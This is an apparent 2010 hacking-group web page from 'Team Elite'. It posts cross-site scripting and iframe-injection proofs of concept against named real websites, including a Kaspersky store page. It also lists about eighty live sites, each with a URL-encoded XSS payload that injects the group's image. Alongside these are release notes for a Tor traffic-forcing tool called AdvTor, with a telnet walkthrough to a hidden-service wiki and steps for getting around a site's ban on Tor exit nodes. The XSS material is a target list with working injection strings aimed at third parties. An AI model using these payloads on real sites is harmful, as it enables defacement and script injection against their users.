Nemesis Our Projects Forums Extra Controls
  RegMe

News


Kaspersky eStore Powered by Softkey.ru XSS Vulnerability

Vulnerable page: http://kaspersky.softkey.ru/basket/

PoC:

Code:
"<br /><br /><img src=http://nemesis.te-home.net/img/logo.jpg /><br /><a href=http://nemesis.te-home.net/>http://nemesis.te-home.net/</a><a b=


http://desmond.yfrog.com/Himg80/scaled.php?tn=0&server=80&filename=kaspbasket.png&xsize=640&ysize=640

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.

Submitted on 2010-09-02 by [-TE-]-RoLex (0 comments)

avsoft.pl - XSS & IFrame Injection

Vulnerable page - http://www.avsoft.pl/pl/order.html?action=confirm

PoC:
Code:
"><h1>XSS BY TEAM ELITE</h1>
and
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img294.imageshack.us/img294/7066/avastqp.png

Submitted on 2010-09-01 by [-TE-]-Neo (0 comments)

AdvTor 0.1.0.5

New release of Advanced TOR: version 0.1.0.5.

Changes:
  • corrected: if LoadLibrary failed in target process, it was still shown as intercepted
  • corrected: when unloading the AdvTor.dll, UnloadDLL did not wait for PipeThread to finish
  • corrected: high CPU usage if no running exit nodes were found (thanks to RoLex for reporting this problem)
  • corrected: system tray menus were not closed when the user clicked outside them
  • corrected: AdvTor.dll did not always close handles of remote threads
  • corrected: AdvTor.dll did not always free the memory it allocated in other processes
  • corrected: AdvTor.dll did not intercept process creation functions if the option to fake local time was disabled
  • corrected: intercepted processes that were not updated in GUI were not released when AdvTor exited
  • corrected: intercepting functions in suspended processes sometimes failed
  • corrected: AdvTor.dll could re-hook same procedure twice if a previous instance was terminated from task manager
  • corrected: AdvTor.exe will no longer attempt to intercept itself if the user selects it from process list (thanks to RoLex for reporting this error)
  • if no running exit nodes can be found for selected country, the notification message is shown only once, until a good exit node is found (thanks to RoLex for reporting this problem)
  • the confusing message "attempt to bypass proxy settings" is replaced with "redirecting connection from address" (thanks to Meka][Meka for reporting this problem)
  • system tray menu has a new submenu "Release" with all intercepted processes to allow unloading AdvTor.dll from them
  • AdvTor.dll now shows more information about interception failures
  • AdvTor.dll no longer loads user32.dll in intercepted processes
  • AdvTor.dll also intercepts functions gethostbyname, WSAAsyncGetHostByName, gethostbyaddr, WSAAsyncGetHostByAddr (Windows 2000+), getnameinfo, GetNameInfoW, getaddrinfo, GetAddrInfoW (Windows XP SP2+) (thanks to RoLex for helping with tests)
  • programs that are intercepted by AdvTor will have all DNS queries and reverse DNS queries resolved by OR network
  • programs that are intercepted can access .onion addresses, AdvTor.dll will resolve them to an IP within range 127.16.* (localhost) and will keep a cache with geneated IPs and corresponding .onion addresses to use in connection requests
  • process tree also shows PID values when selecting a window
  • when AdvTor.dll sends a notification about an intercepted process that doesn't respect proxy settings, it also shows the PID for that process (requested by RoLex)
  • the lists with exit nodes will also have an entry "no exit", for those who want only to see where an intercepted program would connect, but without allowing it to connect or to send anything
  • added verification for "localhost" so an intercepted process won't try to use OR network to resolve it (Opera resolves "localhost" every time you save a file)
  • added verification for "wpad" to prevent vulnerable applications from using OR network to resolve it (Chrome, IE, Yahoo Messenger, etc.)

Download:



Version 0.1.0.5 of Advanced TOR can intercept all DNS / reverse DNS queries and redirect them to OR network. If an application doesn't always use its configured proxy settings, a warning message is shown in Debug window and its connection attempts and DNS queries are redirected. Those familiar with Tor know that Tor can work with addresses that can not be resolved by normal name servers. Addresses of hidden services (*.onion) are valid only in OR network but they are connect-only and they don't resolve to an IP. In this particular case, when a program calls a resolve function for an .onion address, AdvTor will return a fake IP in range 127.16.* and it will keep a cache with fake IPs + corresponding .onion addresses that will be used when a program wants to connect to one of these addresses.
As an example, let's see how we can use telnet to connect to the hidden wiki. First, we start a command prompt and use the "Force TOR" option to intercept its process creation functions and Winsock calls.

http://img691.imageshack.us/img691/8705/telnet1.png

To use telnet to connect to the hidden wiki, we can use the following command:
Code:
telnet kpvz7ki2v5agwt35.onion 80


http://img835.imageshack.us/img835/9609/telnet2.png

http://img189.imageshack.us/img189/1908/advtor1.png

When the connection is established, a good HTTP request can be sent with telnet:
Code:
GET /wiki/index.php/Main_Page HTTP/1.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kpvz7ki2v5agwt35.onion
Connection: Keep-Alive



http://img685.imageshack.us/img685/7272/telnet3.png

See also:



Submitted on 2010-08-29 by Vektor (0 comments)

Collection of XSS vulnerable websites

Here's a list with XSS vulnerable websites that doesn't require POST method for submitting a query:

http://www.serials.ws/?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://subscene.com/filmsearch.aspx?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.zebulon.fr/search.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://promoddl.com/ddl.php?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://keygenguru.com/search/?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.crackserver.com/search.php?name=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.zcrack.com/crack_download_search.php?crack=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://keygens.nl/cracked_warez_search.php?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.crackfind.com/test.php?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.supercracks.net/search.php?crack=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.mucacadownloads.com/search.php?where=&amp;what=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.andr.net/?str=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://search.gamecopyworld.com:9999/data/gcw.shtml?search=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.smartcracks.com/search.php?crack=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.cracklooker.com/search.shtml?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://crackcrew.com/search.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.smartserials.com/search_serial.php?serials=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.serialsws.org/?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.freedownloadscenter.com/Search/newsearch.php3?Category=0&amp;S_S=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.serialbay.com/search.html?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.superserials.com/search.php?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.torrentpharma.com/search.php?searWords=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://search.monova.org/search.php?term=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://ligg.org/search_torrent/?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://torrent.jiwang.cc/torrents-search.php?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://torrentman.com/search.php?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://extratorrent.com/search/?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.areze.com/videos.php?vq=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.tooorgle.com/results.php?security=666&amp;q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://searchenginewatch.com/sew_search_results?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://en.kingofsat.net/find.php?question=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.snap.com/classicsearch.php?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.the-breaks.com/search.php?term=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.opendrivers.com/search.php?search=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.nodevice.com/search/search.html?text=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.givemefile.net/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.itprofessionals.co.uk/searchresults.asp?keyword=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://se.creative.com/search/?keywords=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://rapidpedia.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.searchshared.com/?key=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.rapidsharedata.com/tag/%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.filesearch.gr/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.rapid4files.com/rapidshare.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://rapidtrend.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://filefab.com/index.php?psearch=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.sensus.se/Sok/Sok-pa-webbplatsen/?searchquery=%22%3Cimg%20src=http%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://nt.se/sok/?querystring=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.undertexter.se/?p=soek&amp;str=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://nyheter24.se/filmtipset/search.cgi?search_value=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://feber.se/search/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://xage.ru/tag.php?tag=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://search.mywebsearch.com/mywebsearch/AJmain.jhtml?searchfor=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.pics4learning.com/?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.poemhunter.com/search/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www-spires.fnal.gov/spires/find/hep/?rawcmd=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://blindsearch.fejus.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://web1.exactseek.com/webclient/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.mega-search.net/search.php?group=audio&amp;terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.librarything.com/search_author.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://thenextweb.com/?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.mp3hunting.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.addall.com/New/submitNew.cgi?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://metasearch.com/www2search.cgi?p=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.chemindustry.com/apps/search/?search_term=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.webhostingsearch.com/search?searchString=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.musicrobot.com/cgi-bin/search.pl?terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://domain-search.domaintools.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.fco.gov.uk/en/advanced-search?t=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.socialworksearch.com/cgi/socialwork.cgi?Terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.hostsearch.com/search_results.asp?zoom_query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://cpan.uwinnipeg.ca/search?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.displaysearch.com/cps/rde/xchg/displaysearch/hs.xsl/search_results.asp?txtSearchText=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.culturalheritage.net/cgi-bin/search/hyperseek.cgi?Terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://infomine.ucr.edu/cgi-bin/canned_search?query=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.filez.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.hyperdictionary.com/search.aspx?define=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.dict.org/bin/Dict?Query=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.ldoceonline.com/noresult/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.wordsmyth.net/?ent=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.allwords.com/query.php?Keyword=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.

This collection is to be continued, aswell as a collection of websites that require POST method for submitting a query.

Submitted on 2010-08-27 by [-TE-]-RoLex (0 comments)

AdvTor 0.1.0.4

AdvTor 0.1.0.4 can find a process by selecting a window it created. When a window is selected, AdvTor will show a tree with all processes that have same executable name as the process that created the window and all child processes created by them.

http://img840.imageshack.us/img840/7223/chrome1.png

Usually, most people who change proxy settings in their browsers want to check their new IP. One of the most visited websites by people who want to check their IP is http://www.whatismyip.com . Unfortunately, most Tor exit nodes are banned there.

http://img829.imageshack.us/img829/9498/chrome2c.png

Can a website be DoS'ed with a request every 5 minutes ? A website hosted on a dial-up connection can handle more. To bypass this ban, first we enable tracking for ".whatismyip.com" address.

http://img826.imageshack.us/img826/1908/advtor1.png

We search for an exit node that is not banned.

http://img717.imageshack.us/img717/1797/advtor2.png

To make sure that every time you visit www.whatismyip.com the node that is not banned is used as exit node, select the option to remember exit for www.whatismyip.com .

http://img829.imageshack.us/img829/1730/advtor3.png

Changes:
  • GeoIP information is included as a pre-compiled search tree, GeoIP lookup functions are written in asm; also, a conversion program is included to convert a downloaded GeoIPCountryWhois.csv to geoip_c.h (csv2asm)
  • AdvTor now also intercepts CreateProcessAsUser from advapi32.dll
  • context menu from debug window has more options related to selected text if an address is found in it: track exit for selected_host (config option: TrackHostExits), remember/forget exit for selected_host (config option: AddressMap)
  • debug messages shown by AdvTor.dll have different severity levels
  • current exit node is shown in title bar
  • added a DialogBox for selecting a specific exit node or a country from which a random exit node will be chosen (accessible from "New identity" or from systray menu option "Advanced")
  • added a "Process Finder" DialogBox to help selecting a process by selecting a window it created
  • system tray menu has a list with 30 usable exit nodes
  • AdvTor verifies the minimum required version of AdvTor.dll (version 0.1.0.4 requires AdvTor.dll 0.1.0.4)


Download:



Submitted on 2010-08-21 by Vektor (0 comments)



Older